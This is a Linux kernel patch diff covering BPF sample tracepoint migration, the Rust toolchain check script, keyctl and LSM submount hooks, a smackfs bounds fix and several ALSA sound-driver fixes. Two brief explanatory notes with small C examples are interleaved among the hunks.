+ 		for_each_valid_link(wdev, link_id)
+diff --git a/samples/bpf/tracex3_kern.c b/samples/bpf/tracex3_kern.c
+index bde6591cb20c5..af235bd6615b1 100644
+--- a/samples/bpf/tracex3_kern.c
++++ b/samples/bpf/tracex3_kern.c
+@@ -11,6 +11,12 @@
+ #include <bpf/bpf_helpers.h>
+ #include <bpf/bpf_tracing.h>
+ 
++struct start_key {
++	dev_t dev;
++	u32 _pad;
++	sector_t sector;
++};
++
+ struct {
+ 	__uint(type, BPF_MAP_TYPE_HASH);
+ 	__type(key, long);
+@@ -18,16 +24,17 @@ struct {
+ 	__uint(max_entries, 4096);
+ } my_map SEC(".maps");
+ 
+-/* kprobe is NOT a stable ABI. If kernel internals change this bpf+kprobe
+- * example will no longer be meaningful
+- */
+-SEC("kprobe/blk_mq_start_request")
+-int bpf_prog1(struct pt_regs *ctx)
++/* from /sys/kernel/tracing/events/block/block_io_start/format */
++SEC("tracepoint/block/block_io_start")
++int bpf_prog1(struct trace_event_raw_block_rq *ctx)
+ {
+-	long rq = PT_REGS_PARM1(ctx);
+ 	u64 val = bpf_ktime_get_ns();
++	struct start_key key = {
++		.dev = ctx->dev,
++		.sector = ctx->sector
++	};
+ 
+-	bpf_map_update_elem(&my_map, &rq, &val, BPF_ANY);
++	bpf_map_update_elem(&my_map, &key, &val, BPF_ANY);
+ 	return 0;
+ }
+ 
+@@ -49,21 +56,26 @@ struct {
+ 	__uint(max_entries, SLOTS);
+ } lat_map SEC(".maps");
+ 
+-SEC("kprobe/__blk_account_io_done")
+-int bpf_prog2(struct pt_regs *ctx)
++/* from /sys/kernel/tracing/events/block/block_io_done/format */
++SEC("tracepoint/block/block_io_done")
++int bpf_prog2(struct trace_event_raw_block_rq *ctx)
+ {
+-	long rq = PT_REGS_PARM1(ctx);
++	struct start_key key = {
++		.dev = ctx->dev,
++		.sector = ctx->sector
++	};
++
+ 	u64 *value, l, base;
+ 	u32 index;
+ 
+-	value = bpf_map_lookup_elem(&my_map, &rq);
++	value = bpf_map_lookup_elem(&my_map, &key);
+ 	if (!value)
+ 		return 0;
+ 
+ 	u64 cur_time = bpf_ktime_get_ns();
+ 	u64 delta = cur_time - *value;
+ 
+-	bpf_map_delete_elem(&my_map, &rq);
++	bpf_map_delete_elem(&my_map, &key);
+ 
+ 	/* the lines below are computing index = log10(delta)*10
+ 	 * using integer arithmetic
+diff --git a/samples/bpf/tracex6_kern.c b/samples/bpf/tracex6_kern.c
+index acad5712d8b4f..fd602c2774b8b 100644
+--- a/samples/bpf/tracex6_kern.c
++++ b/samples/bpf/tracex6_kern.c
+@@ -2,6 +2,8 @@
+ #include <linux/version.h>
+ #include <uapi/linux/bpf.h>
+ #include <bpf/bpf_helpers.h>
++#include <bpf/bpf_tracing.h>
++#include <bpf/bpf_core_read.h>
+ 
+ struct {
+ 	__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
+@@ -45,13 +47,24 @@ int bpf_prog1(struct pt_regs *ctx)
+ 	return 0;
+ }
+ 
+-SEC("kprobe/htab_map_lookup_elem")
+-int bpf_prog2(struct pt_regs *ctx)
++/*
++ * Since *_map_lookup_elem can't be expected to trigger bpf programs
++ * due to potential deadlocks (bpf_disable_instrumentation), this bpf
++ * program will be attached to bpf_map_copy_value (which is called
++ * from map_lookup_elem) and will only filter the hashtable type.
++ */
++SEC("kprobe/bpf_map_copy_value")
++int BPF_KPROBE(bpf_prog2, struct bpf_map *map)
+ {
+ 	u32 key = bpf_get_smp_processor_id();
+ 	struct bpf_perf_event_value *val, buf;
++	enum bpf_map_type type;
+ 	int error;
+ 
++	type = BPF_CORE_READ(map, map_type);
++	if (type != BPF_MAP_TYPE_HASH)
++		return 0;
++
+ 	error = bpf_perf_event_read_value(&counters, key, &buf, sizeof(buf));
+ 	if (error)
+ 		return 0;
+diff --git a/scripts/rust_is_available.sh b/scripts/rust_is_available.sh
+index aebbf19139709..7a925d2b20fc7 100755
+--- a/scripts/rust_is_available.sh
++++ b/scripts/rust_is_available.sh
+@@ -2,8 +2,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ #
+ # Tests whether a suitable Rust toolchain is available.
+-#
+-# Pass `-v` for human output and more checks (as warnings).
+ 
+ set -e
+ 
+@@ -23,21 +21,17 @@ get_canonical_version()
+ 
+ # Check that the Rust compiler exists.
+ if ! command -v "$RUSTC" >/dev/null; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** Rust compiler '$RUSTC' could not be found."
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
++	echo >&2 "*** Rust compiler '$RUSTC' could not be found."
++	echo >&2 "***"
+ 	exit 1
+ fi
+ 
+ # Check that the Rust bindings generator exists.
+ if ! command -v "$BINDGEN" >/dev/null; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** Rust bindings generator '$BINDGEN' could not be found."
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
++	echo >&2 "*** Rust bindings generator '$BINDGEN' could not be found."
++	echo >&2 "***"
+ 	exit 1
+ fi
+ 
+@@ -53,16 +47,14 @@ rust_compiler_min_version=$($min_tool_version rustc)
+ rust_compiler_cversion=$(get_canonical_version $rust_compiler_version)
+ rust_compiler_min_cversion=$(get_canonical_version $rust_compiler_min_version)
+ if [ "$rust_compiler_cversion" -lt "$rust_compiler_min_cversion" ]; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** Rust compiler '$RUSTC' is too old."
+-		echo >&2 "***   Your version:    $rust_compiler_version"
+-		echo >&2 "***   Minimum version: $rust_compiler_min_version"
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
++	echo >&2 "*** Rust compiler '$RUSTC' is too old."
++	echo >&2 "***   Your version:    $rust_compiler_version"
++	echo >&2 "***   Minimum version: $rust_compiler_min_version"
++	echo >&2 "***"
+ 	exit 1
+ fi
+-if [ "$1" = -v ] && [ "$rust_compiler_cversion" -gt "$rust_compiler_min_cversion" ]; then
++if [ "$rust_compiler_cversion" -gt "$rust_compiler_min_cversion" ]; then
+ 	echo >&2 "***"
+ 	echo >&2 "*** Rust compiler '$RUSTC' is too new. This may or may not work."
+ 	echo >&2 "***   Your version:     $rust_compiler_version"
+@@ -82,16 +74,14 @@ rust_bindings_generator_min_version=$($min_tool_version bindgen)
+ rust_bindings_generator_cversion=$(get_canonical_version $rust_bindings_generator_version)
+ rust_bindings_generator_min_cversion=$(get_canonical_version $rust_bindings_generator_min_version)
+ if [ "$rust_bindings_generator_cversion" -lt "$rust_bindings_generator_min_cversion" ]; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** Rust bindings generator '$BINDGEN' is too old."
+-		echo >&2 "***   Your version:    $rust_bindings_generator_version"
+-		echo >&2 "***   Minimum version: $rust_bindings_generator_min_version"
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
++	echo >&2 "*** Rust bindings generator '$BINDGEN' is too old."
++	echo >&2 "***   Your version:    $rust_bindings_generator_version"
++	echo >&2 "***   Minimum version: $rust_bindings_generator_min_version"
++	echo >&2 "***"
+ 	exit 1
+ fi
+-if [ "$1" = -v ] && [ "$rust_bindings_generator_cversion" -gt "$rust_bindings_generator_min_cversion" ]; then
++if [ "$rust_bindings_generator_cversion" -gt "$rust_bindings_generator_min_cversion" ]; then
+ 	echo >&2 "***"
+ 	echo >&2 "*** Rust bindings generator '$BINDGEN' is too new. This may or may not work."
+ 	echo >&2 "***   Your version:     $rust_bindings_generator_version"
+@@ -100,23 +90,39 @@ if [ "$1" = -v ] && [ "$rust_bindings_generator_cversion" -gt "$rust_bindings_ge
+ fi
+ 
+ # Check that the `libclang` used by the Rust bindings generator is suitable.
++#
++# In order to do that, first invoke `bindgen` to get the `libclang` version
++# found by `bindgen`. This step may already fail if, for instance, `libclang`
++# is not found, thus inform the user in such a case.
++bindgen_libclang_output=$( \
++	LC_ALL=C "$BINDGEN" $(dirname $0)/rust_is_available_bindgen_libclang.h 2>&1 >/dev/null
++) || bindgen_libclang_code=$?
++if [ -n "$bindgen_libclang_code" ]; then
++	echo >&2 "***"
++	echo >&2 "*** Running '$BINDGEN' to check the libclang version (used by the Rust"
++	echo >&2 "*** bindings generator) failed with code $bindgen_libclang_code. This may be caused by"
++	echo >&2 "*** a failure to locate libclang. See output and docs below for details:"
++	echo >&2 "***"
++	echo >&2 "$bindgen_libclang_output"
++	echo >&2 "***"
++	exit 1
++fi
++
++# `bindgen` returned successfully, thus use the output to check that the version
++# of the `libclang` found by the Rust bindings generator is suitable.
+ bindgen_libclang_version=$( \
+-	LC_ALL=C "$BINDGEN" $(dirname $0)/rust_is_available_bindgen_libclang.h 2>&1 >/dev/null \
+-		| grep -F 'clang version ' \
+-		| grep -oE '[0-9]+\.[0-9]+\.[0-9]+' \
+-		| head -n 1 \
++	echo "$bindgen_libclang_output" \
++		| sed -nE 's:.*clang version ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
+ )
+ bindgen_libclang_min_version=$($min_tool_version llvm)
+ bindgen_libclang_cversion=$(get_canonical_version $bindgen_libclang_version)
+ bindgen_libclang_min_cversion=$(get_canonical_version $bindgen_libclang_min_version)
+ if [ "$bindgen_libclang_cversion" -lt "$bindgen_libclang_min_cversion" ]; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** libclang (used by the Rust bindings generator '$BINDGEN') is too old."
+-		echo >&2 "***   Your version:    $bindgen_libclang_version"
+-		echo >&2 "***   Minimum version: $bindgen_libclang_min_version"
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
++	echo >&2 "*** libclang (used by the Rust bindings generator '$BINDGEN') is too old."
++	echo >&2 "***   Your version:    $bindgen_libclang_version"
++	echo >&2 "***   Minimum version: $bindgen_libclang_min_version"
++	echo >&2 "***"
+ 	exit 1
+ fi
+ 
+@@ -125,21 +131,19 @@ fi
+ #
+ # In the future, we might be able to perform a full version check, see
+ # https://github.com/rust-lang/rust-bindgen/issues/2138.
+-if [ "$1" = -v ]; then
+-	cc_name=$($(dirname $0)/cc-version.sh "$CC" | cut -f1 -d' ')
+-	if [ "$cc_name" = Clang ]; then
+-		clang_version=$( \
+-			LC_ALL=C "$CC" --version 2>/dev/null \
+-				| sed -nE '1s:.*version ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
+-		)
+-		if [ "$clang_version" != "$bindgen_libclang_version" ]; then
+-			echo >&2 "***"
+-			echo >&2 "*** libclang (used by the Rust bindings generator '$BINDGEN')"
+-			echo >&2 "*** version does not match Clang's. This may be a problem."
+-			echo >&2 "***   libclang version: $bindgen_libclang_version"
+-			echo >&2 "***   Clang version:    $clang_version"
+-			echo >&2 "***"
+-		fi
++cc_name=$($(dirname $0)/cc-version.sh $CC | cut -f1 -d' ')
++if [ "$cc_name" = Clang ]; then
++	clang_version=$( \
++		LC_ALL=C $CC --version 2>/dev/null \
++			| sed -nE '1s:.*version ([0-9]+\.[0-9]+\.[0-9]+).*:\1:p'
++	)
++	if [ "$clang_version" != "$bindgen_libclang_version" ]; then
++		echo >&2 "***"
++		echo >&2 "*** libclang (used by the Rust bindings generator '$BINDGEN')"
++		echo >&2 "*** version does not match Clang's. This may be a problem."
++		echo >&2 "***   libclang version: $bindgen_libclang_version"
++		echo >&2 "***   Clang version:    $clang_version"
++		echo >&2 "***"
+ 	fi
+ fi
+ 
+@@ -150,11 +154,9 @@ rustc_sysroot=$("$RUSTC" $KRUSTFLAGS --print sysroot)
+ rustc_src=${RUST_LIB_SRC:-"$rustc_sysroot/lib/rustlib/src/rust/library"}
+ rustc_src_core="$rustc_src/core/src/lib.rs"
+ if [ ! -e "$rustc_src_core" ]; then
+-	if [ "$1" = -v ]; then
+-		echo >&2 "***"
+-		echo >&2 "*** Source code for the 'core' standard library could not be found"
+-		echo >&2 "*** at '$rustc_src_core'."
+-		echo >&2 "***"
+-	fi
++	echo >&2 "***"
++	echo >&2 "*** Source code for the 'core' standard library could not be found"
++	echo >&2 "*** at '$rustc_src_core'."
++	echo >&2 "***"
+ 	exit 1
+ fi
+diff --git a/security/integrity/ima/Kconfig b/security/integrity/ima/Kconfig
+index 60a511c6b583e..c17660bf5f347 100644
+--- a/security/integrity/ima/Kconfig
++++ b/security/integrity/ima/Kconfig
+@@ -248,18 +248,6 @@ config IMA_APPRAISE_MODSIG
+ 	   The modsig keyword can be used in the IMA policy to allow a hook
+ 	   to accept such signatures.
+ 
+-config IMA_TRUSTED_KEYRING
+-	bool "Require all keys on the .ima keyring be signed (deprecated)"
+-	depends on IMA_APPRAISE && SYSTEM_TRUSTED_KEYRING
+-	depends on INTEGRITY_ASYMMETRIC_KEYS
+-	select INTEGRITY_TRUSTED_KEYRING
+-	default y
+-	help
+-	   This option requires that all keys added to the .ima
+-	   keyring be signed by a key on the system trusted keyring.
+-
+-	   This option is deprecated in favor of INTEGRITY_TRUSTED_KEYRING
+-
+ config IMA_KEYRINGS_PERMIT_SIGNED_BY_BUILTIN_OR_SECONDARY
+ 	bool "Permit keys validly signed by a built-in or secondary CA cert (EXPERIMENTAL)"
+ 	depends on SYSTEM_TRUSTED_KEYRING
+diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c
+index d54f73c558f72..19be69fa4d052 100644
+--- a/security/keys/keyctl.c
++++ b/security/keys/keyctl.c
+@@ -980,14 +980,19 @@ long keyctl_chown_key(key_serial_t id, uid_t user, gid_t group)
+ 	ret = -EACCES;
+ 	down_write(&key->sem);
+ 
+-	if (!capable(CAP_SYS_ADMIN)) {
++	{
++		bool is_privileged_op = false;
++
+ 		/* only the sysadmin can chown a key to some other UID */
+ 		if (user != (uid_t) -1 && !uid_eq(key->uid, uid))
+-			goto error_put;
++			is_privileged_op = true;
+ 
+ 		/* only the sysadmin can set the key's GID to a group other
+ 		 * than one of those that the current process subscribes to */
+ 		if (group != (gid_t) -1 && !gid_eq(gid, key->gid) && !in_group_p(gid))
++			is_privileged_op = true;
++
++		if (is_privileged_op && !capable(CAP_SYS_ADMIN))
+ 			goto error_put;
+ 	}
+ 
+@@ -1088,7 +1093,7 @@ long keyctl_setperm_key(key_serial_t id, key_perm_t perm)
+ 	down_write(&key->sem);
+ 
+ 	/* if we're not the sysadmin, we can only change a key that we own */
+-	if (capable(CAP_SYS_ADMIN) || uid_eq(key->uid, current_fsuid())) {
++	if (uid_eq(key->uid, current_fsuid()) || capable(CAP_SYS_ADMIN)) {
+ 		key->perm = perm;
+ 		notify_key(key, NOTIFY_KEY_SETATTR, 0);
+ 		ret = 0;
+diff --git a/security/security.c b/security/security.c
+index 75dc0947ee0cf..5fa286ae9908d 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -882,6 +882,20 @@ void security_bprm_committed_creds(struct linux_binprm *bprm)
+ 	call_void_hook(bprm_committed_creds, bprm);
+ }
+ 
++/**
++ * security_fs_context_submount() - Initialise fc->security
++ * @fc: new filesystem context
++ * @reference: dentry reference for submount/remount
++ *
++ * Fill out the ->security field for a new fs_context.
++ *
++ * Return: Returns 0 on success or negative error code on failure.
++ */
++int security_fs_context_submount(struct fs_context *fc, struct super_block *reference)
++{
++	return call_int_hook(fs_context_submount, 0, fc, reference);
++}
++
+ int security_fs_context_dup(struct fs_context *fc, struct fs_context *src_fc)
+ {
+ 	return call_int_hook(fs_context_dup, 0, fc, src_fc);
+diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
+index f553c370397ee..26c9e4da4efcf 100644
+--- a/security/selinux/hooks.c
++++ b/security/selinux/hooks.c
+@@ -2766,6 +2766,27 @@ static int selinux_umount(struct vfsmount *mnt, int flags)
+ 				   FILESYSTEM__UNMOUNT, NULL);
+ }
+ 
++static int selinux_fs_context_submount(struct fs_context *fc,
++				   struct super_block *reference)
++{
++	const struct superblock_security_struct *sbsec;
++	struct selinux_mnt_opts *opts;
++
++	opts = kzalloc(sizeof(*opts), GFP_KERNEL);
++	if (!opts)
++		return -ENOMEM;
++
++	sbsec = selinux_superblock(reference);
++	if (sbsec->flags & FSCONTEXT_MNT)
++		opts->fscontext_sid = sbsec->sid;
++	if (sbsec->flags & CONTEXT_MNT)
++		opts->context_sid = sbsec->mntpoint_sid;
++	if (sbsec->flags & DEFCONTEXT_MNT)
++		opts->defcontext_sid = sbsec->def_sid;
++	fc->security = opts;
++	return 0;
++}
++
+ static int selinux_fs_context_dup(struct fs_context *fc,
+ 				  struct fs_context *src_fc)
+ {
+@@ -7263,6 +7284,7 @@ static struct security_hook_list selinux_hooks[] __lsm_ro_after_init = {
+ 	/*
+ 	 * PUT "CLONING" (ACCESSING + ALLOCATING) HOOKS HERE
+ 	 */
++	LSM_HOOK_INIT(fs_context_submount, selinux_fs_context_submount),
+ 	LSM_HOOK_INIT(fs_context_dup, selinux_fs_context_dup),
+ 	LSM_HOOK_INIT(fs_context_parse_param, selinux_fs_context_parse_param),
+ 	LSM_HOOK_INIT(sb_eat_lsm_opts, selinux_sb_eat_lsm_opts),
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index b6306d71c9088..67dcd31cd3f3d 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -611,6 +611,56 @@ out_opt_err:
+ 	return -EINVAL;
+ }
+ 
++/**
++ * smack_fs_context_submount - Initialise security data for a filesystem context
++ * @fc: The filesystem context.
++ * @reference: reference superblock
++ *
++ * Returns 0 on success or -ENOMEM on error.
++ */
++static int smack_fs_context_submount(struct fs_context *fc,
++				 struct super_block *reference)
++{
++	struct superblock_smack *sbsp;
++	struct smack_mnt_opts *ctx;
++	struct inode_smack *isp;
++
++	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
++	if (!ctx)
++		return -ENOMEM;
++	fc->security = ctx;
++
++	sbsp = smack_superblock(reference);
++	isp = smack_inode(reference->s_root->d_inode);
++
++	if (sbsp->smk_default) {
++		ctx->fsdefault = kstrdup(sbsp->smk_default->smk_known, GFP_KERNEL);
++		if (!ctx->fsdefault)
++			return -ENOMEM;
++	}
++
++	if (sbsp->smk_floor) {
++		ctx->fsfloor = kstrdup(sbsp->smk_floor->smk_known, GFP_KERNEL);
++		if (!ctx->fsfloor)
++			return -ENOMEM;
++	}
++
++	if (sbsp->smk_hat) {
++		ctx->fshat = kstrdup(sbsp->smk_hat->smk_known, GFP_KERNEL);
++		if (!ctx->fshat)
++			return -ENOMEM;
++	}
++
++	if (isp->smk_flags & SMK_INODE_TRANSMUTE) {
++		if (sbsp->smk_root) {
++			ctx->fstransmute = kstrdup(sbsp->smk_root->smk_known, GFP_KERNEL);
++			if (!ctx->fstransmute)
++				return -ENOMEM;
++		}
++	}
++	return 0;
++}
++
+ /**
+  * smack_fs_context_dup - Duplicate the security data on fs_context duplication
+  * @fc: The new filesystem context.
+@@ -4792,6 +4842,7 @@ static struct security_hook_list smack_hooks[] __lsm_ro_after_init = {
+ 	LSM_HOOK_INIT(ptrace_traceme, smack_ptrace_traceme),
+ 	LSM_HOOK_INIT(syslog, smack_syslog),
+ 
++	LSM_HOOK_INIT(fs_context_submount, smack_fs_context_submount),
+ 	LSM_HOOK_INIT(fs_context_dup, smack_fs_context_dup),
+ 	LSM_HOOK_INIT(fs_context_parse_param, smack_fs_context_parse_param),
+ 
+diff --git a/security/smack/smackfs.c b/security/smack/smackfs.c
+index 4b58526450d49..da7db9e22ce7c 100644
+--- a/security/smack/smackfs.c
++++ b/security/smack/smackfs.c
+@@ -896,7 +896,7 @@ static ssize_t smk_set_cipso(struct file *file, const char __user *buf,
+ 	}
+ 
+ 	ret = sscanf(rule, "%d", &catlen);
+-	if (ret != 1 || catlen > SMACK_CIPSO_MAXCATNUM)
++	if (ret != 1 || catlen < 0 || catlen > SMACK_CIPSO_MAXCATNUM)
+ 		goto out;
+ 
+ 	if (format == SMK_FIXED24_FMT &&
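
The one-line smackfs fix works because sscanf's %d happily parses a leading sign, so an upper-bound test alone is not a complete range check. A minimal standalone illustration, assuming nothing beyond standard C (the bound value here is illustrative; the real SMACK_CIPSO_MAXCATNUM lives in smack.h):

    /* %d accepts negatives, so bound checks must cover both ends */
    #include <stdio.h>

    #define MAXCATNUM 184   /* illustrative stand-in for SMACK_CIPSO_MAXCATNUM */

    static int parse_catlen(const char *rule, int *catlen)
    {
            if (sscanf(rule, "%d", catlen) != 1)
                    return -1;                          /* no integer at all */
            if (*catlen < 0 || *catlen > MAXCATNUM)
                    return -1;                          /* out of range */
            return 0;
    }

    int main(void)
    {
            int n;

            /* "-3" parses successfully; only the explicit < 0 test rejects it */
            return parse_catlen("-3", &n) == -1 ? 0 : 1;
    }
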
+diff --git a/sound/Kconfig b/sound/Kconfig
+index e56d96d2b11ca..1903c35d799e1 100644
+--- a/sound/Kconfig
++++ b/sound/Kconfig
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ menuconfig SOUND
+ 	tristate "Sound card support"
+-	depends on HAS_IOMEM
++	depends on HAS_IOMEM || UML
+ 	help
+ 	  If you have a sound card in your computer, i.e. if it can say more
+ 	  than an occasional beep, say Y.
+diff --git a/sound/core/pcm_compat.c b/sound/core/pcm_compat.c
+index 42c2ada8e8887..c96483091f30a 100644
+--- a/sound/core/pcm_compat.c
++++ b/sound/core/pcm_compat.c
+@@ -253,10 +253,14 @@ static int snd_pcm_ioctl_hw_params_compat(struct snd_pcm_substream *substream,
+ 		goto error;
+ 	}
+ 
+-	if (refine)
++	if (refine) {
+ 		err = snd_pcm_hw_refine(substream, data);
+-	else
++		if (err < 0)
++			goto error;
++		err = fixup_unreferenced_params(substream, data);
++	} else {
+ 		err = snd_pcm_hw_params(substream, data);
++	}
+ 	if (err < 0)
+ 		goto error;
+ 	if (copy_to_user(data32, data, sizeof(*data32)) ||
+diff --git a/sound/core/seq/oss/seq_oss_midi.c b/sound/core/seq/oss/seq_oss_midi.c
+index 07efb38f58ac1..f2940b29595f0 100644
+--- a/sound/core/seq/oss/seq_oss_midi.c
++++ b/sound/core/seq/oss/seq_oss_midi.c
+@@ -37,6 +37,7 @@ struct seq_oss_midi {
+ 	struct snd_midi_event *coder;	/* MIDI event coder */
+ 	struct seq_oss_devinfo *devinfo;	/* assigned OSSseq device */
+ 	snd_use_lock_t use_lock;
++	struct mutex open_mutex;
+ };
+ 
+ 
+@@ -172,6 +173,7 @@ snd_seq_oss_midi_check_new_port(struct snd_seq_port_info *pinfo)
+ 	mdev->flags = pinfo->capability;
+ 	mdev->opened = 0;
+ 	snd_use_lock_init(&mdev->use_lock);
++	mutex_init(&mdev->open_mutex);
+ 
+ 	/* copy and truncate the name of synth device */
+ 	strscpy(mdev->name, pinfo->name, sizeof(mdev->name));
+@@ -322,15 +324,17 @@ snd_seq_oss_midi_open(struct seq_oss_devinfo *dp, int dev, int fmode)
+ 	int perm;
+ 	struct seq_oss_midi *mdev;
+ 	struct snd_seq_port_subscribe subs;
++	int err;
+ 
+ 	mdev = get_mididev(dp, dev);
+ 	if (!mdev)
+ 		return -ENODEV;
+ 
++	mutex_lock(&mdev->open_mutex);
+ 	/* already used? */
+ 	if (mdev->opened && mdev->devinfo != dp) {
+-		snd_use_lock_free(&mdev->use_lock);
+-		return -EBUSY;
++		err = -EBUSY;
++		goto unlock;
+ 	}
+ 
+ 	perm = 0;
+@@ -340,14 +344,14 @@ snd_seq_oss_midi_open(struct seq_oss_devinfo *dp, int dev, int fmode)
+ 		perm |= PERM_READ;
+ 	perm &= mdev->flags;
+ 	if (perm == 0) {
+-		snd_use_lock_free(&mdev->use_lock);
+-		return -ENXIO;
++		err = -ENXIO;
++		goto unlock;
+ 	}
+ 
+ 	/* already opened? */
+ 	if ((mdev->opened & perm) == perm) {
+-		snd_use_lock_free(&mdev->use_lock);
+-		return 0;
++		err = 0;
++		goto unlock;
+ 	}
+ 
+ 	perm &= ~mdev->opened;
+@@ -372,13 +376,17 @@ snd_seq_oss_midi_open(struct seq_oss_devinfo *dp, int dev, int fmode)
+ 	}
+ 
+ 	if (! mdev->opened) {
+-		snd_use_lock_free(&mdev->use_lock);
+-		return -ENXIO;
++		err = -ENXIO;
++		goto unlock;
+ 	}
+ 
+ 	mdev->devinfo = dp;
++	err = 0;
++
++ unlock:
++	mutex_unlock(&mdev->open_mutex);
+ 	snd_use_lock_free(&mdev->use_lock);
+-	return 0;
++	return err;
+ }
+ 
+ /*
+@@ -393,10 +401,9 @@ snd_seq_oss_midi_close(struct seq_oss_devinfo *dp, int dev)
+ 	mdev = get_mididev(dp, dev);
+ 	if (!mdev)
+ 		return -ENODEV;
+-	if (! mdev->opened || mdev->devinfo != dp) {
+-		snd_use_lock_free(&mdev->use_lock);
+-		return 0;
+-	}
++	mutex_lock(&mdev->open_mutex);
++	if (!mdev->opened || mdev->devinfo != dp)
++		goto unlock;
+ 
+ 	memset(&subs, 0, sizeof(subs));
+ 	if (mdev->opened & PERM_WRITE) {
+@@ -415,6 +422,8 @@ snd_seq_oss_midi_close(struct seq_oss_devinfo *dp, int dev)
+ 	mdev->opened = 0;
+ 	mdev->devinfo = NULL;
+ 
++ unlock:
++	mutex_unlock(&mdev->open_mutex);
+ 	snd_use_lock_free(&mdev->use_lock);
+ 	return 0;
+ }
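
The seq_oss_midi changes above convert scattered "free the use-lock and return" pairs into one mutex-guarded region with a single unlock label, so every exit path releases both locks in order. A hedged userspace analogue of the same shape, with a pthread mutex standing in for the kernel mutex:

    /* userspace analogue of the locked-open pattern; types are stand-ins */
    #include <errno.h>
    #include <pthread.h>

    struct mididev_stub {
            pthread_mutex_t open_mutex;
            int opened;
            void *owner;
    };

    static int open_dev(struct mididev_stub *m, void *who)
    {
            int err;

            pthread_mutex_lock(&m->open_mutex);
            if (m->opened && m->owner != who) {
                    err = -EBUSY;           /* someone else holds it */
                    goto unlock;
            }
            m->opened = 1;
            m->owner = who;
            err = 0;
    unlock:
            pthread_mutex_unlock(&m->open_mutex);
            return err;
    }
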
+diff --git a/sound/pci/ac97/ac97_codec.c b/sound/pci/ac97/ac97_codec.c
+index 534ea7a256ec3..606b318f34e56 100644
+--- a/sound/pci/ac97/ac97_codec.c
++++ b/sound/pci/ac97/ac97_codec.c
+@@ -2070,10 +2070,9 @@ int snd_ac97_mixer(struct snd_ac97_bus *bus, struct snd_ac97_template *template,
+ 		.dev_disconnect =	snd_ac97_dev_disconnect,
+ 	};
+ 
+-	if (!rac97)
+-		return -EINVAL;
+-	if (snd_BUG_ON(!bus || !template))
++	if (snd_BUG_ON(!bus || !template || !rac97))
+ 		return -EINVAL;
++	*rac97 = NULL;
+ 	if (snd_BUG_ON(template->num >= 4))
+ 		return -EINVAL;
+ 	if (bus->codec[template->num])
+diff --git a/sound/pci/hda/patch_cs8409.c b/sound/pci/hda/patch_cs8409.c
+index 0ba1fbcbb21e4..627899959ffe8 100644
+--- a/sound/pci/hda/patch_cs8409.c
++++ b/sound/pci/hda/patch_cs8409.c
+@@ -888,7 +888,7 @@ static void cs42l42_resume(struct sub_codec *cs42l42)
+ 
+ 	/* Initialize CS42L42 companion codec */
+ 	cs8409_i2c_bulk_write(cs42l42, cs42l42->init_seq, cs42l42->init_seq_num);
+-	usleep_range(30000, 35000);
++	msleep(CS42L42_INIT_TIMEOUT_MS);
+ 
+ 	/* Clear interrupts, by reading interrupt status registers */
+ 	cs8409_i2c_bulk_read(cs42l42, irq_regs, ARRAY_SIZE(irq_regs));
+diff --git a/sound/pci/hda/patch_cs8409.h b/sound/pci/hda/patch_cs8409.h
+index 2a8dfb4ff046b..937e9387abdc7 100644
+--- a/sound/pci/hda/patch_cs8409.h
++++ b/sound/pci/hda/patch_cs8409.h
+@@ -229,6 +229,7 @@ enum cs8409_coefficient_index_registers {
+ #define CS42L42_I2C_SLEEP_US			(2000)
+ #define CS42L42_PDN_TIMEOUT_US			(250000)
+ #define CS42L42_PDN_SLEEP_US			(2000)
++#define CS42L42_INIT_TIMEOUT_MS			(45)
+ #define CS42L42_FULL_SCALE_VOL_MASK		(2)
+ #define CS42L42_FULL_SCALE_VOL_0DB		(1)
+ #define CS42L42_FULL_SCALE_VOL_MINUS6DB		(0)
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index aa475154c582f..f70e0ad81607e 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9591,7 +9591,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8b, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+-	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b97, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+diff --git a/sound/soc/atmel/atmel-i2s.c b/sound/soc/atmel/atmel-i2s.c
+index 425d66edbf867..5e43ff0b537a3 100644
+--- a/sound/soc/atmel/atmel-i2s.c
++++ b/sound/soc/atmel/atmel-i2s.c
